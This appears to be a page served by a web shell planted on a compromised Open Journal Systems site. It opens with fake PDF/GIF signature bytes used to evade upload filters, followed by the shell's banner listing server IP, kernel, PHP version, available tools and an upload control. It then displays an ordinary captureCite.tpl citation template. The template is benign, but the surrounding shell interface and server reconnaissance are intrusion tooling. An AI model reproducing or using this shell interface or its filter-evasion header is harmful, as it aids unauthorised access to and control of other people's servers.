%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/JetliJournal/templates/rt/ |
Upload File : |
{**
* templates/rt/captureCite.tpl
*
* Copyright (c) 2003-2012 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Article reading tools -- Capture Citation
*
*}
{strip}
{assign var=pageTitle value="rt.captureCite"}
{include file="rt/header.tpl"}
{/strip}
{if $galleyId}
{url|assign:"articleUrl" page="article" op="view" path=$articleId|to_array:$galleyId}
{else}
{url|assign:"articleUrl" page="article" op="view" path=$articleId}
{/if}
<div id="captureCite">
<h3>{$article->getLocalizedTitle()|strip_unsafe_html}</h3>
<form action="#">
<label for="citeType">{translate key="rt.captureCite.format"}</label> <select onchange="document.location='{url|escape:"javascript" path=$articleId|to_array:$galleyId:"REPLACE"}'.replace('REPLACE', this.options[this.selectedIndex].value)">
{foreach from=$citationPlugins item=thisCitationPlugin}
<option {if $citationPlugin && $citationPlugin->getName() == $thisCitationPlugin->getName()}selected="selected" {/if}value="{$thisCitationPlugin->getName()|escape}">{$thisCitationPlugin->getCitationFormatName()|escape}</option>
{/foreach}
</select>
</form>
{call_hook name="Template::RT::CaptureCite"}
</div>
<div class="separator"></div>
{include file="rt/footer.tpl"}